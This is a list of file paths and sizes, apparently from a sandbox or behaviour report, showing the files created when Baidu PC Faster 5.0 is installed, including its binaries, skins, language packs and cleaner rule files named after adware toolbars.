%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1057\update\update.bskin (12 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\ProgramFileList.xml (12536 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10095.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswBF.tmp (1437980 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Nokia_off.png (486 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\ZTE_on.png (500 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Huawei_off.png (646 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1028\feedback\feedback.bskin (5064 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Optimizer\SysOptEngine.dll (38904 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Fonts\HelveticaNeueLTPro-Th.otf (1552 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1142.KeyBar1.13.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\skin_default\skin_default.bskin (8184 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\liveupdate.exe (16424 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1028\hipspop\hipspop.bskin (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10203.png (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\NEC_off.png (463 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1076.SavingsAddon.rul (8 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\3082\update\update.bskin (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1028\tools\FasterNow\FasterNow.bskin (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\t4.db (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1033\nsis_install\nsis_install.bskin (1856 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\Ask.rul (10 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\tools\NSISInstall\NSISInstall.bskin (15168 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1152.DealCola.rul (10 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1131.SocialSearchBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\MainFrame\shadow.png (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0019.AlfaAutorunKiller.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\appbario7.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\MyWebSearch.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1057\BaiduSafe\BaiduSafe.bskin (9320 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Microsoft_off.png (341 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\WhiteSmokeToolBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\PCFasterFeedback.exe (27704 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1081.Funmoods.rul (15 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1128.EasyTVBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1172.AskPartnerNetwork.rul (1552 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0012.TheWeatherChannelApp.rul (731 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Google_off.png (637 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1063.SnapDo.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1046\BugReporter\BugReporter.bskin (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Updater.exe (37025 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\weather\big\lightning.png (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\3082\lang.ini (100 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1102.FastFreeConverter.rul (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\tools\common\common.bskin (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\CrashReport.exe (25776 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\MEIZU_on.png (367 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1054\feedback\feedback.bskin (5064 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1028\tools\BigFileCleaner\BigFileCleaner.bskin (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\MainFrame\tool_box.png (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1144.WiseConvertB2.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1028\popups\popups.bskin (3312 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\weather\big\cloud.png (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1063.SnapDo.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1148.KeyBar1.8.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1115.Qwiklinx.rul (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10023.png (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\DafaultPhone_off.png (405 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\skin_boottime\skin_boottime.bskin (23296 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1107.TVGenie.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10063.png (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\3082\feedback\feedback.bskin (5064 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1049.SocialSearchBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1148.KeyBar1.8.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1057\confirm\confirm.bskin (2392 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\Tuvaro.rul (6 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\NetworkSpeedTester\download_light.png (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1088.yontooToolbar.rul (16 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1033\popups\popups.bskin (3312 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\webcake.rul (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1143.BrowserPlus2.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\BrowserProtect.rul (101 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1145.FreeSoundRecorder.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1074.CodecPerformer.rul (6 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1057\popups\popups.bskin (3616 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\Yontoo.rul (5 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1116.NewVeoh.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1057\ieprotect\ieprotect.bskin (15 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10230.png (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1180.TNT2-ide.rul (5 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10149.png (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1054\BaiduSafe\BaiduSafe.bskin (8560 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\NetworkSpeedTester\map_EG.png (30344 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1049.SocialSearchBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1085.facesmooch.rul (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1178.IminentToolbar.rul (1552 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\WhiteSmokeToolBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\Aflamster.rul (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1054\confirm\confirm.bskin (3312 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1145.FreeSoundRecorder.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1064.Webblog.rul (16 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\FasterNow\memory_circle.png (9 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\dynamic\WorldCup\server.txt (85 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\Communication.dll (11048 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0021.MP3Rocket.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\BProtectEx.sys (3616 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1058.ScenicReflections.rul (16 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\Genieo.rul (6 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1033\lang.ini (100 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0003.VuuPC.rul (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0010.Martview.rul (10 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1046\ieprotect_font\ieprotect_font.bskin (486 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10531.png (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\NetworkSpeedTester\bk_downloading.png (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\loading.png (5 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0025.SpeedBitVideoDownloader.rul (14 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1094.BittorrentBar_DEToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1146.BrotherSoftExtremeToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1162.TidyNetwork.rul (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Optimizer\SysOpt\optlist.dat (46278 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1112.SaveValet.rul (465 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\CrashUL.exe (11048 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1140.BroderbundBar.rul (784 bytes)
%Documents and Settings%\All Users\Documents\Baidu Security\PC Faster\4.0.0.0\config.ini (73 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update.dll (34561 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\tools\skin_feedback\skin_feedback.bskin (3616 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Facebook\Plugin_Facebook.dll (12536 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1046\ieprotect\ieprotect.bskin (11 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\Tuvaro.rul (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\url.ini (9 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Samsung_on.png (603 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\VidSaver.rul (6 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1033\ieprotect\ieprotect.bskin (13 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\11248.png (3 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Baidu PC Faster\Baidu PC Faster.lnk (974 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\PCFHelper.exe (26688 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\FasterNow\fast_big_outer_circel.png (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1097.NCH FRToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1033\tools\BigFileCleaner\BigFileCleaner.bskin (1 bytes)
%Documents and Settings%\All Users\Application Data\Baidu Security\PC Faster\RpData\rpFile-Baidu_Secure_SystemUp_5.0.4.87531-2014-12-20 12-34-14-0404-[8244].tmp (1286 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\ShoppingSidekick.rul (8 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Lenovo_off.png (551 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1132.SerifBar.rul (16 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1033\confirm\confirm.bskin (2392 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\log64.dll (4992 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\BrowserProtect.rul (101 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\RebateInformer.rul (6 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.HomeEx\res\res.bskin (15168 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\CouponDropDown.rul (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\apple_off.png (536 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1054\tools\BigFileCleaner\BigFileCleaner.bskin (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\fn.dat (1552 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Philips_off.png (439 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1046\popups\popups.bskin (3616 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1046\update\update.bskin (13 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\DeepClean.exe (46278 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1147.EntrustedToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1052.TigerSavings.rul (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1151.NinjaSavings.rul (11 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0031.KCSoftwaresSUMo.rul (560 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1105.FreeYoutubeDownload.rul (14 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1104.SavepathDeals.rul (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Yulong_on.png (616 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10174.png (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\3082\tools\FasterNow\FasterNow.bskin (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\11355.png (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Plugin_Cleaner.dll (35784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1054\NewFeatures\NewFeatures.bskin (9320 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\skin_ieprotect\skin_ieprotect.bskin (13 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1054\PcfTray\PcfTray.bskin (2392 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\VDownloader_Ask.rul (8 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1093.BittorrentBar_FRToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\Genieo.rul (6 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1028\ieprotect_font\ieprotect_font.bskin (488 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\skin_frame\skin_frame.bskin (6360 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\GameFaster\restore_mask.png (798 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\GiantSavings.rul (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\LG_off.png (596 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\tools\DeepClean\res\res.bskin (12536 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1057\tools\FasterNow\FasterNow.bskin (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\BHips.dll (22192 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1164.RecordChecker.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\NetworkSpeedTester\upload_light.png (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1046\tools\FasterNow\FasterNow.bskin (1 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Baidu PC Faster\Feedback.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\InstallUtility.log (256186 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\weather\small\cloud.png (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1137.TVersityBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\FasterNow\memory_circle_point.png (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Motorola_on.png (577 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\HTC_on.png (497 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Lenovo_on.png (603 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1097.NCH FRToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\MEIZU_off.png (375 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1106.GetSavin.rul (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\logo\system\10.png (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1086.DownloadEnergyToolbar.rul (16 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1083.PriceGong.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\weather\small\foggy.png (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\3082\ieprotect\ieprotect.bskin (1552 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1114.ST-Eng7.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1129.HamInfoBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1118.A2ZLyrics.rul (8 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1098.NewYorkYankeesToolbar.rul (16 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1166.SpyAlert.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1093.BittorrentBar_FRToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1137.TVersityBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1033\NewFeatures\NewFeatures.bskin (9320 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\BrowserDefender.rul.bak (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Alcatel_on.png (565 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\BlackBerry_off.png (440 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1054\screensnpashot\screensnpashot.bskin (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\log.dll (4992 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1028\common\common.bskin (389 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1054.CouponCaddy.rul (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\Yontoo.rul (5 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1110.BrowseForTheCause.rul (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1107.TVGenie.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\Deal Spy.rul (8 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1057\ieprotect_font\ieprotect_font.bskin (486 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\Inbox.rul (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1090.DVDVideoSoftToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1058.ScenicReflections.rul (16 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\logo\system\9.png (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\NetworkSpeedTester\upload_circle.png (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1033\screensnpashot\screensnpashot.bskin (956 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1105.FreeYoutubeDownload.rul (14 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1111.Vuze.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1140.BroderbundBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\PcfTray\PcfTray.bskin (1856 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1070.IMVUToolbar.rul (16 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\dynamic\PluginHome\rocket.bskin (13368 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Optimizer\SysOpt\optrec.5.1.def.db (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Antivirus\Plugin_Antivirus.dll (25776 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1028\update\update.bskin (14 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1028\ieprotect\ieprotect.bskin (13 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\uTorrentBar.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1046\sound\startup.wav (5520 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1121.KeyBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Palm_on.png (477 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1185.InstantSavingsApp.rul (12 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\BETManger.dll (21216 bytes)
%Documents and Settings%\All Users\Application Data\Duplicaterecord.js (14 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Uninstall.exe (16944 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1061.SearchProtect.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\PluginConfig.xml (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\StartNow.rul (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\NewFeatures.txt (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1082.PricePeep.rul (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1072.MyHomepage.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\3082\screensnpashot\screensnpashot.bskin (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1165.SavingsScout.rul (11 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\StartNow.rul (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\BlackBerry_on.png (426 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1033\PcfTray\PcfTray.bskin (1856 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\skin_junkclean\skin_junkclean.bskin (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1104.SavepathDeals.rul (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\data\rl.dat (789 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1180.TNT2-ide.rul (5 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1088.yontooToolbar.rul (16 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\IWantThis.rul (9 bytes)
